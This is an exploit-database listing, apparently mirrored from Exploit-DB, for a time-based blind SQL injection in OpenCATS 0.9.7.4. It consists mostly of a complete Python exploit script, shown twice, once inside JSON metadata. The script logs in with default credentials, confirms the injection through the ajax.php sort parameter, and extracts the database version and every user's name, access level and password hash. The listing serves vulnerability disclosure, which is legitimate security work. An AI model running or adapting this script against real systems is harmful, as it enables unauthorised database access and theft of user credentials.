OpenCATS 0.9.7.4 – SQL Injection_EDB-ID:52579

Description

Exploit Title: OpenCATS 0.9.7.4 - SQL Injection Exploit Author: Gabriel Rodrigues TEXUGO from HAKAI Vendor Homepage: https://www.opencats.org Software Link: https://github.com/opencats/OpenCATS Version: 1 else "http://localhost:8888" user = sys.argv2...

Visit Original Source

Basic Information

ID EDB-ID:52579

Published May 27, 2026 at 00:00

Affected Product

Affected Versions # Exploit Title: OpenCATS 0.9.7.4 - SQL Injection
# Exploit Author: Gabriel Rodrigues (TEXUGO) from HAKAI
# Vendor Homepage: https://www.opencats.org
# Software Link: https://github.com/opencats/OpenCATS
# Version: <= 0.9.7.4
# Tested on: Ubuntu 22.04 / Apache2 / PHP / MariaDB 10.6
# CVE: N/A (GHSA-8mc8-5gw6-c7w4)
import requests, json, sys, time

url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8888"
user = sys.argv[2] if len(sys.argv) > 2 else "admin"
pw = sys.argv[3] if len(sys.argv) > 3 else "cats"
delay = 1.5

s = requests.Session()
s.get(f"{url}/index.php")
s.post(f"{url}/index.php?m=login&a=attemptLogin", data={"username": user, "password": pw}, allow_redirects=True)

def sqli(payload):
t = time.time()
s.get(f"{url}/ajax.php", timeout=30, params={"f": "getDataGridPager",
"i": "candidates:candidatesListByViewDataGrid",
"p": json.dumps({"sortBy": "dateModifiedSort", "sortDirection": payload, "rangeStart": 0, "maxResults": 15})})
return time.time() - t

def blind(cond):
return sqli(f"DESC,IF(({cond}),SLEEP({delay}),0)") > delay * 0.6

def extract(query, maxlen=100):
out = ""
for i in range(1, maxlen + 1):
if blind(f"LENGTH({query})<{i}"): break
lo, hi = 32, 126
while lo < hi:
mid = (lo + hi) // 2
lo, hi = (mid + 1, hi) if blind(f"ORD(SUBSTRING({query},{i},1))>{mid}") else (lo, mid)
out += chr(lo)
return out

base = sqli("DESC")
slp = sqli("DESC,SLEEP(2)")
print(f"baseline={base:.2f}s sleep(2)={slp:.2f}s")
assert slp > base + 1, "not vulnerable or no candidate rows"
print("injection confirmed\n")

print("version:", extract("@@version", 30))
print("database:", extract("DATABASE()", 20))

n = int(extract("(SELECT COUNT(*) FROM user)", 3))
print(f"users: {n}\n")
for i in range(n):
name = extract(f"(SELECT user_name FROM user ORDER BY user_id LIMIT {i},1)", 40)
level = extract(f"(SELECT access_level FROM user ORDER BY user_id LIMIT {i},1)", 5)
hash_ = extract(f"(SELECT password FROM user ORDER BY user_id LIMIT {i},1)", 62)
print(f" {name} level={level} hash={hash_}")

{
    "lastseen": "2026-05-27T13:27:58",
    "description": "Exploit Title: OpenCATS 0.9.7.4 - SQL Injection Exploit Author: Gabriel Rodrigues TEXUGO from HAKAI Vendor Homepage: https://www.opencats.org Software Link: https://github.com/opencats/OpenCATS Version: 1 else \"http://localhost:8888\" user = sys.argv2...",
    "published": "2026-05-27T00:00:00",
    "modified": "2026-05-27T00:00:00",
    "type": "exploitdb",
    "title": "OpenCATS 0.9.7.4 - SQL Injection",
    "source": "",
    "references": "",
    "id": "EDB-ID:52579",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "# Exploit Title: OpenCATS 0.9.7.4 - SQL Injection\r\n# Exploit Author: Gabriel Rodrigues (TEXUGO) from HAKAI\r\n# Vendor Homepage: https://www.opencats.org\r\n# Software Link: https://github.com/opencats/OpenCATS\r\n# Version: <= 0.9.7.4\r\n# Tested on: Ubuntu 22.04 / Apache2 / PHP / MariaDB 10.6\r\n# CVE: N/A (GHSA-8mc8-5gw6-c7w4)\r\nimport requests, json, sys, time\r\n\r\nurl   = sys.argv[1] if len(sys.argv) > 1 else \"http://localhost:8888\"\r\nuser  = sys.argv[2] if len(sys.argv) > 2 else \"admin\"\r\npw    = sys.argv[3] if len(sys.argv) > 3 else \"cats\"\r\ndelay = 1.5\r\n\r\ns = requests.Session()\r\ns.get(f\"{url}/index.php\")\r\ns.post(f\"{url}/index.php?m=login&a=attemptLogin\", data={\"username\": user, \"password\": pw}, allow_redirects=True)\r\n\r\ndef sqli(payload):\r\n    t = time.time()\r\n    s.get(f\"{url}/ajax.php\", timeout=30, params={\"f\": \"getDataGridPager\",\r\n        \"i\": \"candidates:candidatesListByViewDataGrid\",\r\n        \"p\": json.dumps({\"sortBy\": \"dateModifiedSort\", \"sortDirection\": payload, \"rangeStart\": 0, \"maxResults\": 15})})\r\n    return time.time() - t\r\n\r\ndef blind(cond):\r\n    return sqli(f\"DESC,IF(({cond}),SLEEP({delay}),0)\") > delay * 0.6\r\n\r\ndef extract(query, maxlen=100):\r\n    out = \"\"\r\n    for i in range(1, maxlen + 1):\r\n        if blind(f\"LENGTH({query})<{i}\"): break\r\n        lo, hi = 32, 126\r\n        while lo < hi:\r\n            mid = (lo + hi) // 2\r\n            lo, hi = (mid + 1, hi) if blind(f\"ORD(SUBSTRING({query},{i},1))>{mid}\") else (lo, mid)\r\n        out += chr(lo)\r\n    return out\r\n\r\nbase = sqli(\"DESC\")\r\nslp  = sqli(\"DESC,SLEEP(2)\")\r\nprint(f\"baseline={base:.2f}s  sleep(2)={slp:.2f}s\")\r\nassert slp > base + 1, \"not vulnerable or no candidate rows\"\r\nprint(\"injection confirmed\\n\")\r\n\r\nprint(\"version:\", extract(\"@@version\", 30))\r\nprint(\"database:\", extract(\"DATABASE()\", 20))\r\n\r\nn = int(extract(\"(SELECT COUNT(*) FROM user)\", 3))\r\nprint(f\"users: {n}\\n\")\r\nfor i in range(n):\r\n    name  = extract(f\"(SELECT user_name FROM user ORDER BY user_id LIMIT {i},1)\", 40)\r\n    level = extract(f\"(SELECT access_level FROM user ORDER BY user_id LIMIT {i},1)\", 5)\r\n    hash_ = extract(f\"(SELECT password FROM user ORDER BY user_id LIMIT {i},1)\", 62)\r\n    print(f\"  {name}  level={level}  hash={hash_}\")",
    "sourceHref": "https://www.exploit-db.com/raw/52579",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.exploit-db.com/exploits/52579",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply